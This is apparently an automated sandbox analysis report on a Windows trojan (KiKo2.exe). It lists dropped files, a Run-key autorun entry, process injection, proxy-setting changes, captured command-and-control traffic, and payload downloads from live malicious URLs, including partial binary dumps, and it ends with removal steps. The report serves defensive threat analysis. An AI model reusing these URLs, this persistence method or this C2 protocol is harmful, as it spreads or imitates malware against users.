MD5: f5798be4bede0b19af8c4e0d64d16c19
SHA1: 535492c09fcddd7964bfd01d4a5ad808704b329c
SHA256: b576cf26d39220318483f4d375bb4c33428e4ee3b83d066d1845c8485fc57595
SSDeep: 24576:g/E8X4leBFqZNGDTL3nuMIrXZLdeaUzDWk2LN3O2wd7QUwIEqi1oy0HSGgJrn9g1:fWaGrJIrXZxJ0dDNlyHNP88KLveG
Size: 2383872 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: PMW1ExecutableImageusingDOSExtender, MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-03-27 11:35:55
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

oaSxO69ceEYCuoXQifBI.exe:2892

The Application injects its code into the following process(es):

oaSxO69ceE.exe:2540
%original file name%.exe:3340

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process oaSxO69ceE.exe:2540 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (38 bytes)

The process %original file name%.exe:3340 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe (34156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceEYCuoXQifBI.exe (24029 bytes)

Registry activity

The process oaSxO69ceE.exe:2540 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"1ZC2LXW2CD3Q5SL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe"

The process %original file name%.exe:3340 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "14/04/2017"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process oaSxO69ceEYCuoXQifBI.exe:2892 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: YE
Product Name: YEPG1L5
Product Version: 2.1.8.0
Legal Copyright: Copyright (c) 4306
Legal Trademarks:
Original Filename: KiKo2.exe
Internal Name: KiKo2.exe
File Version: 2.1.8.0
File Description: YEPG1L
Comments: Y
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://goodthingshostedhere.com/get/4/remote.exe	94.23.252.37
wizzcaster.com	176.31.107.87
teredo.ipv6.microsoft.com	157.56.106.189
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /api/v5/config HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 38

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK

Date: Fri, 14 Apr 2017 09:54:39 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=ec1db606d953e8c5aa6a9290bd204335ea2005c5; expires=Fri, 14-Apr-2017 11:54:39 GMT; Max-Age=7200; path=/; httponly

Content-Length: 28

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Fri, 14 Apr 2017 09
:54:39 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=ec1db606d953e8c5aa6a9290bd204335ea2005c5; e
xpires=Fri, 14-Apr-2017 11:54:39 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 17

Expect: 100-continue

HTTP/1.1 100 Continue
....



uid=57a764d042bf8

HTTP/1.1 200 OK

Date: Fri, 14 Apr 2017 09:54:40 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=736e7946a4aa03c4f5c88386eae55461aed7ba2c; expires=Fri, 14-Apr-2017 11:54:40 GMT; Max-Age=7200; path=/; httponly

Content-Length: 62

Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bigpicturepop.com\/redirect\/57a764d042bf8"}HTTP/1.1
 200 OK..Date: Fri, 14 Apr 2017 09:54:40 GMT..Server: Apache/2.4.10 (D
ebian)..Cache-Control: no-cache..Set-Cookie: laravel_session=736e7946a
4aa03c4f5c88386eae55461aed7ba2c; expires=Fri, 14-Apr-2017 11:54:40 GMT
; Max-Age=7200; path=/; httponly..Content-Length: 62..Content-Type: te
xt/html; charset=UTF-8..{"link":"http:\/\/bigpicturepop.com\/redirect\
/57a764d042bf8"}..

GET /get/4/remote.exe HTTP/1.1

Host: goodthingshostedhere.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 14 Apr 2017 09:54:33 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="remote.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
81e00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......X.........."...0..>...........]... ...`....@.. ..............
.........`............@..................................\..O....`..D.
...................@.......[..........................................
..... ............... ..H............text...4=... ...>.............
..... ..`.rsrc...D....`.......@..............@..@.reloc.......@.......
...............@..B.................]......H.......D#..@............3.
. (...........................................0...........(......&..*.
.................(....*.~....-.r...p.....(....o....s.........~....*.~.
...*.......*.~....*..(....*Vs....(....t.........*.0..C........(......o
....r?..po......o....t$...%-.rU..ps....z.......%...o....&*..0..~......
.rW..p(........&...%..|.o....&...o.....( ...o!.......o.....("...( ...o
!.......("...X.o.....o.....("....XY( ...o!....(....(#...*...0.........
.~$....s%....... ...o&...... ...s'......r{..pr...p ...... ...o(...o)..
..(#.....o....s*........o ....s,...........io-.....o......o/..... ....
....jo0..........o/...io1...&(2.....o3........,...o4......,...o4.....*
.........j.M.........Z.i........0..3............(....r...po5..........
%...%.(.....o....&..&..*.........//........(6...*.0..&.......(7....o8.
....s9...%o:.....o;...o<....*..BSJB............v2.0.50727......l...
h...#~..........#Strings............#US.x.......#GUID...........#Blob.
..........W..........3........2...................<............
<<< skipped >>>

GET /get/3/wizzcaster_v2.exe HTTP/1.1

Host: goodthingshostedhere.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 14 Apr 2017 09:54:33 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
ab800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...v..X.........."...0..............9... ...@....@.. .................
...................@.................................|9..O....@..t....
.......................D8.............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...t....@......................@..@.reloc.....................
.........@..B.................9......H.......D#..P............3.......
........................................0...........(......&..*.......
...........(....*.~....-.r...p.....(....o....s.........~....*.~....*..
.....*.~....*..(....*Vs....(....t.........*.0..C........(......o....r?
..po......o....t$...%-.rU..ps....z.......%...o....&*..0..~.......rW..p
(........&...%..|.o....&...o.....( ...o!.......o.....("...( ...o!.....
..("...X.o.....o.....("....XY( ...o!....(....(#...*...0..........~$...
.s%....... ...o&...... ...s'......r{..pr...p ...... ...o(...o)....(#..
...o....s*........o ....s,...........io-.....o......o/..... ........jo
0..........o/...io1...&(2.....o3........,...o4......,...o4.....*......
...j.M.........Z.i........0..3............(....r...po5..........%...%.
(.....o....&..&..*.........//........(6...*.0..&.......(7....o8.....s9
...%o:.....o;...o<....*..BSJB............v2.0.50727......l...h...#~
..........#Strings............#US.x.......#GUID...........#Blob.......
....W..........3........2...................<..................
<<< skipped >>>

The Application connects to the servers at the folowing location(s):

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_2760:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

%original file name%.exe_3340_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

oaSxO69ceE.exe_2540_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

SearchProtocolHost.exe_256:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

</MSG></TRC>

<MSG>

<ERR> 0xx=

<LOC> %s(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<LOC> %S(%d) </LOC>

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

SearchFilterHost.exe_1388:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

<requestedExecutionLevel

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<ERR> 0xx=

<LOC> %S(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

</MSG></TRC>

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   oaSxO69ceEYCuoXQifBI.exe:2892

2. Delete the original Application file.
   
3. Delete or disinfect the following files created/modified by the Application:
   

   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (38 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe (34156 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceEYCuoXQifBI.exe (24029 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "1ZC2LXW2CD3Q5SL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.